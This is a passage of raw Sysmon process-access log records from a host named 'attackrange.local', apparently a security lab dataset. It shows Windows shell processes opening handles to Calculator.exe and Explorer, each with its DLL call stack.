Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+12ce5|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362365Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.866{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+12ce5|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362364Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.866{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362363Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.866{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362362Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.851{8e433fbf-2a44-6013-0e00-000000001100}7124808C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+310c0|C:\Windows\SYSTEM32\psmserviceexthost.dll+30dbf|C:\Windows\SYSTEM32\ntdll.dll+6ba5|C:\Windows\SYSTEM32\ntdll.dll+67f1|C:\Windows\SYSTEM32\ntdll.dll+6650|C:\Windows\SYSTEM32\ntdll.dll+305ac|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362361Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.851{8e433fbf-337b-6013-8402-000000001100}16568356C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+10c49|C:\Windows\System32\NPSMDesktopProvider.dll+10b82|C:\Windows\System32\NPSMDesktopProvider.dll+774d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362360Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.851{8e433fbf-337b-6013-8402-000000001100}16568356C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+10c49|C:\Windows\System32\NPSMDesktopProvider.dll+10b82|C:\Windows\System32\NPSMDesktopProvider.dll+774d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362359Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.851{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362358Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.851{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362357Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.851{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362356Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.851{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+25de9|C:\Windows\System32\ApplicationFrame.dll+6106|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362355Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.851{8e433fbf-337e-6013-9402-000000001100}75848948C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+25de9|C:\Windows\System32\ApplicationFrame.dll+6106|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362354Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.851{8e433fbf-337a-6013-7e02-000000001100}63045600C:\Windows\system32\ctfmon.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\MSCTF.dll+328e0|C:\Windows\System32\MSCTF.dll+31adc|C:\Windows\System32\MSCTF.dll+3176f|C:\Windows\System32\MSCTF.dll+315d2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362353Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.835{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+29d07|c:\windows\system32\capabilityaccessmanager.dll+1ca30|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000362352Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.835{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+29d07|c:\windows\system32\capabilityaccessmanager.dll+1c8fa|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000362351Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.835{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+29d07|c:\windows\system32\capabilityaccessmanager.dll+2aa9f|c:\windows\system32\capabilityaccessmanager.dll+1c8c2|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf 10341000x8000000000000000362350Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.835{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+2976b|c:\windows\system32\capabilityaccessmanager.dll+1c7d5|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a 10341000x8000000000000000362349Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.835{8e433fbf-36df-6013-a003-000000001100}13126096C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\capabilityaccessmanager.dll+29d07|c:\windows\system32\capabilityaccessmanager.dll+2aa9f|c:\windows\system32\capabilityaccessmanager.dll+28ff4|c:\windows\system32\capabilityaccessmanager.dll+1c666|c:\windows\system32\capabilityaccessmanager.dll+e9a1|c:\windows\system32\capabilityaccessmanager.dll+955f|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480 10341000x8000000000000000362348Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.835{8e433fbf-337b-6013-8402-000000001100}16568412C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\CapabilityAccessManagerClient.dll+14517|C:\Windows\System32\CapabilityAccessManagerClient.dll+141f0|C:\Windows\System32\CapabilityAccessManagerClient.dll+151b5|C:\Windows\System32\CapabilityAccessManagerClient.dll+13ea0|C:\Windows\system32\twinui.pcshell.dll+6bf67|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362347Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.835{8e433fbf-337b-6013-8402-000000001100}16562840C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.pcshell.dll+1f387|C:\Windows\system32\twinui.pcshell.dll+f86ac|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362346Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.835{8e433fbf-337b-6013-8402-000000001100}16568412C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\CapabilityAccessManagerClient.dll+14387|C:\Windows\System32\CapabilityAccessManagerClient.dll+15172|C:\Windows\System32\CapabilityAccessManagerClient.dll+13ea0|C:\Windows\system32\twinui.pcshell.dll+6bf67|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362345Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.835{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000362344Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.819{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362343Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.819{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000362342Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.819{8e433fbf-337b-6013-8402-000000001100}16566064C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+10c49|C:\Windows\System32\NPSMDesktopProvider.dll+10b82|C:\Windows\System32\NPSMDesktopProvider.dll+774d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362341Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.819{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\W